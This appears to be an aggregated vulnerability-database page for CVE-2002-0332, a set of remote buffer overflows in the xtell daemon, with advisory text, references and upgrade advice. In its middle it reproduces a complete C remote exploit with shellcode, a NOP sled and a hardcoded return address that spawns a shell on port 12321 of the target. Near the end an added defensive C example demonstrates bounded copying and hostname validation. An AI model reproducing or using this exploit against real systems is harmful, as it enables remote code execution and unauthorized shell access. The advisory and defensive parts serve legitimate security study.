CVE-2002-0332
CVSS 7.5
Published: 2002-06-25 00:00:00
Last modified: 2016-10-17 22:19:20

[Original] Buffer overflows in xtell (xtelld) 1.91.1 and earlier, and 2.x before 2.7, allows remote attackers to execute arbitrary code via (1) a long DNS hostname that is determined using reverse DNS lookups, (2) a long AUTH string, or (3) certain data in the xtell request.


[CNNVD] xtell Multiple Remote Buffer Overflow Vulnerabilities (CNNVD-200206-089)

Buffer overflow vulnerabilities exist in xtell (xtelld) 1.91.1 and earlier, and in 2.x versions before 2.7. A remote attacker can execute arbitrary code via (1) an overly long DNS hostname obtained through a reverse DNS lookup, (2) an overly long AUTH string, or (3) certain data in the xtell request.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:xtell:xtell:1.91.1
cpe:/a:xtell:xtell:2.6.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0332
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0332
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200206-089
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=101494896516467&w=2
(UNKNOWN)  BUGTRAQ  20020227 Remote exploit against xtelld and other fun
http://www.debian.org/security/2002/dsa-121
(VENDOR_ADVISORY)  DEBIAN  DSA-121
http://www.iss.net/security_center/static/8312.php
(UNKNOWN)  XF  xtell-bo(8312)
http://www.securityfocus.com/bid/4193
(UNKNOWN)  BID  4193

- Vulnerability information

xtell Multiple Remote Buffer Overflow Vulnerabilities
High severity  Buffer overflow
2002-06-25 00:00:00 2005-10-20 00:00:00
Remote
Buffer overflow vulnerabilities exist in xtell (xtelld) 1.91.1 and earlier, and in 2.x versions before 2.7. A remote attacker can execute arbitrary code via (1) an overly long DNS hostname obtained through a reverse DNS lookup, (2) an overly long AUTH string, or (3) certain data in the xtell request.

- Advisories and patches

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
xtell xtell 1.91.1

- Vulnerability information (21309)

xtell 1.91.1/2.6.1 Multiple Remote Buffer Overflow Vulnerabilities (EDBID:21309)
linux remote
2002-02-27 Verified
0 spybreak
N/A
source: http://www.securityfocus.com/bid/4193/info

xtell is a simple network messaging program. It may be used to transmit terminal messages between users and machines. xtell is available for Linux, BSD and most other Unix based operating systems.

Multiple buffer overflow vulnerabilities have been reported in some versions of xtell. If long strings are received by the xtell client, stack memory will be overwritten. Exploitation of these vulnerabilities may result in arbitrary code being executed as the xtell daemon.

Overflow conditions may be triggered by long strings returned by a malicious DNS server in response to the reverse lookup performed when a message is received, by the auth string returned by an ident server, or by directly sending an overly long message to the vulnerable user.

Earlier versions of xtell may share some or all of these vulnerabilities. This has not been confirmed.

cat >xtelld261.c <<EOF

#include <stdio.h>
#include <stdlib.h>      /* atoi, exit */
#include <string.h>      /* memcpy */
#include <unistd.h>      /* getopt, close */
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>  /* socket, connect, send */
#include <netinet/in.h>
#include <arpa/inet.h>   /* htons */

/*
 *      Remote exploit for Xtelld 2.6.1 and older
 *      Spawns shell on port 12321
 *      Don't forget to set your identd string to 200 characters
 *      Tested against Red Hat 7.2, 7.1; Debian Potato
 *      (c) 2002 Spybreak (spybreak@host.sk)
 */

#define RET     0xbffff5a0

char sc[] =
  "\x55\x89\xe5\x31\xc0\x66\xc7\x45\xf2\x30"
  "\x21\x89\x45\xf4\x89\x45\xf8\x89\x45\xfc"
  "\x89\x45\xe8\xfe\xc0\x89\xc3\x89\x45\xe4"
  "\xfe\xc0\x66\x89\x45\xf0\x89\x45\xe0\xb0"
  "\x66\x8d\x4d\xe0\xcd\x80\x89\x45\xe0\xb0"
  "\x66\xfe\xc3\x8d\x55\xf0\x89\x55\xe4\x31"
  "\xd2\xb2\x42\x80\xea\x32\x89\x55\xe8\x8d"
  "\x4d\xe0\xcd\x80\xb0\x66\xfe\xc3\xfe\xc3"
  "\xfe\xc3\x89\x5d\xe4\xfe\xcb\x8d\x4d\xe0"
  "\xcd\x80\xb0\x66\xfe\xc3\x31\xd2\x89\x55"
  "\xe4\x8d\x4d\xe0\xcd\x80\x89\xd9\x89\xc3"
  "\xfe\xc9\xfe\xc9\xfe\xc9\x31\xc0\xb0\x3f"
  "\xcd\x80\xfe\xc1\xe2\xf4\x51\x68\x6e\x2f"
  "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
  "\x89\xe2\x53\x89\xe1\x31\xc0\xb0\x3d\x2c"
  "\x32\xcd\x80";

void
usage (char *exp)
{
  fprintf (stderr, "Remote exploit for xtelld 2.6.1 and older.\n"
           "Spawns shell on port 12321.\n"
           "-- (c) 2002/2 Spybreak --\n"
           "Usage: %s [options] target\n", exp);
  fprintf (stderr, "Options: -a alignment (default 0)\n"
           "         -o offset (default 0)\n"
           "         -p port (default 4224)\n");
  exit (-1);
}

int
main (int argc, char **argv)
{

  int c, s, i, size, port = 4224;
  int ret = RET, alignment = 0;
  struct sockaddr_in target;
  struct hostent *host;
  char payload[1078];

  opterr = 0;

  while ((c = getopt (argc, argv, "a:o:p:")) != -1)
    switch (c)
      {
      case 'a':
        alignment = atoi (optarg);
        break;
      case 'o':
        ret += atoi (optarg);
        break;
      case 'p':
        port = atoi (optarg);
        break;
      default:
        usage (argv[0]);
        exit (1);
      }

  if (!argv[optind])
    {
      puts ("no target!");
      usage (argv[0]);
    }


  printf ("Using: TARGET: %s\tPORT: %d\tADDR: %x\t ALIGN: %d\n",
          argv[optind], port, ret, alignment);

  for (i = 0; i < 540; i++)
    payload[i] = 0x90;

  for (i = 540; i <= 1072; i += 4)
    *((int *) (payload + i)) = ret;


  memcpy (payload + 540, sc, sizeof (sc) - 1);
  memcpy (payload, "01234567890123456789::null:;-)", 30);
  payload[1077 + alignment] = '\n';

  host = gethostbyname (argv[optind]);  /* the target follows any options */
  if (host == NULL)
    {
      perror ("gethostbyname");
      return (-1);
    }

  s = socket (AF_INET, SOCK_STREAM, 0);
  if (s < 0)
    {
      perror ("socket");
      return (-1);
    }

  target.sin_family = AF_INET;
  target.sin_addr = *((struct in_addr *) host->h_addr);
  target.sin_port = htons (port);

  if (connect (s, (struct sockaddr *) &target, sizeof (target)) == -1)
    {
      perror ("connect");
      close (s);
      return (-1);
    }

  size = send (s, payload + alignment, 1078, 0);
  if (size == -1)
    {
      perror ("send");
      close (s);
      return (-1);
    }

  close (s);
  return (0);
}

EOF


- Vulnerability information

5836
Xtell Crafted DNS Name String Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- Vulnerability description

A remote overflow exists in Xtell. The Xtelld daemon fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution with the UID of the Xtell daemon resulting in a loss of integrity.

- Timeline

2002-02-27 Unknown
2002-02-27 Unknown

- Solution

Upgrade to version 2.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Discovered by

- Vulnerability information

xtell Multiple Remote Buffer Overflow Vulnerabilities
Boundary Condition Error 4193
Yes No
2002-02-27 12:00:00 2009-07-11 10:56:00
Discovered by "Spybreak" <spybreak@host.sk>.

- Affected program versions

xtell xtell 2.6.1
xtell xtell 1.91.1
+ Debian Linux 2.2

- Discussion

xtell is a simple network messaging program. It may be used to transmit terminal messages between users and machines. xtell is available for Linux, BSD and most other Unix based operating systems.

Multiple buffer overflow vulnerabilities have been reported in some versions of xtell. If long strings are received by the xtell client, stack memory will be overwritten. Exploitation of these vulnerabilities may result in arbitrary code being executed as the xtell daemon.

Overflow conditions may be triggered by long strings returned by a malicious DNS server in response to the reverse lookup performed when a message is received, by the auth string returned by an ident server, or by directly sending an overly long message to the vulnerable user.

Earlier versions of xtell may share some or all of these vulnerabilities. This has not been confirmed.
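The discussion above (and the identical SecurityFocus text under the EDB entry earlier on this page) names three attacker-influenced inputs that reached fixed stack buffers with no length check: the hostname returned by the reverse DNS lookup, the AUTH reply from the ident server, and the message itself. The C below is an added example written for this page, not xtell's code or the fix shipped in 2.7; the buffer sizes, function names and sample inputs are assumptions chosen to show the defensive pattern: a copy that is bounded by the destination and fails closed, plus a character-set check on anything that came back from a PTR lookup.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Assumed limits for this example (not xtell's own constants). 255 covers
 * the DNS maximum for a presentation-form hostname; RFC 1413 ident replies
 * are at most 512 octets including the CRLF. */
#define HOST_BUF 256
#define AUTH_BUF 512

/* Length of src, scanning at most `cap` bytes so an unterminated input
 * cannot make us read past the region the caller controls. */
static size_t bounded_len(const char *src, size_t cap)
{
    size_t n = 0;
    while (n < cap && src[n] != '\0')
        n++;
    return n;
}

/* Copy an untrusted string (reverse-DNS name, ident reply, message line)
 * into a fixed buffer of `cap` bytes. Returns 0 on success, -1 if the
 * string does not fit or contains a byte outside printable ASCII.
 * On failure dst is the empty string, never a partial copy. */
int copy_untrusted(char *dst, size_t cap, const char *src)
{
    if (cap == 0)
        return -1;
    size_t n = bounded_len(src, cap);
    if (n >= cap) {                  /* no room for the terminating NUL */
        dst[0] = '\0';
        return -1;
    }
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)src[i];
        if (c < 0x20 || c > 0x7e) {  /* CR/LF, 0x90 sleds, high bytes */
            dst[0] = '\0';
            return -1;
        }
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Stricter check for a name returned by a PTR lookup: letters, digits,
 * '-' and '.' only, no empty labels, no label over 63 octets, at most
 * 253 characters in total. Returns 1 if acceptable, else 0. */
int is_valid_hostname(const char *name)
{
    size_t label = 0, total = 0;
    if (name[0] == '\0')
        return 0;
    for (const char *p = name; *p; p++, total++) {
        if (total >= 253)
            return 0;
        if (*p == '.') {
            if (label == 0)          /* ".a", "a..b" */
                return 0;
            label = 0;
            continue;
        }
        if (!isalnum((unsigned char)*p) && *p != '-')
            return 0;
        if (++label > 63)
            return 0;
    }
    return label > 0;                /* trailing '.' leaves an empty label */
}

/* Test helper: copy src into a scratch buffer capped at `cap` bytes. */
int try_copy(const char *src, size_t cap)
{
    char scratch[HOST_BUF];
    if (cap > sizeof scratch)
        cap = sizeof scratch;
    return copy_untrusted(scratch, cap, src);
}

/* Constructed inputs standing in for the three vectors in the record.
 * Returns the number of checks that did not behave as intended (0 = all good). */
int demo(void)
{
    char host[HOST_BUF], auth[AUTH_BUF];
    char long_name[300], sled[40];
    int failures = 0;

    memset(long_name, 'A', sizeof long_name - 1);   /* oversized PTR result */
    long_name[sizeof long_name - 1] = '\0';
    memset(sled, 0x90, sizeof sled - 1);            /* ident reply full of 0x90 */
    sled[sizeof sled - 1] = '\0';

    failures += copy_untrusted(host, sizeof host, "mail.example.net") != 0;
    failures += !is_valid_hostname(host);
    failures += copy_untrusted(host, sizeof host, long_name) != -1;
    failures += copy_untrusted(auth, sizeof auth, sled) != -1;
    return failures;
}

int main(void)
{
    int f = demo();
    printf("%d check(s) failed\n", f);
    return f ? 1 : 0;
}
```

Failing closed matters more than truncating here: a silently truncated hostname or AUTH string still gets logged or displayed as if it were genuine, whereas a rejected one can be counted, and a daemon that logs a burst of rejections from one source is the detection signal a defender wants.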

- Exploit

An exploit has been provided by Spybreak <spybreak@host.sk>:

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.


xtell xtell 1.91.1

- References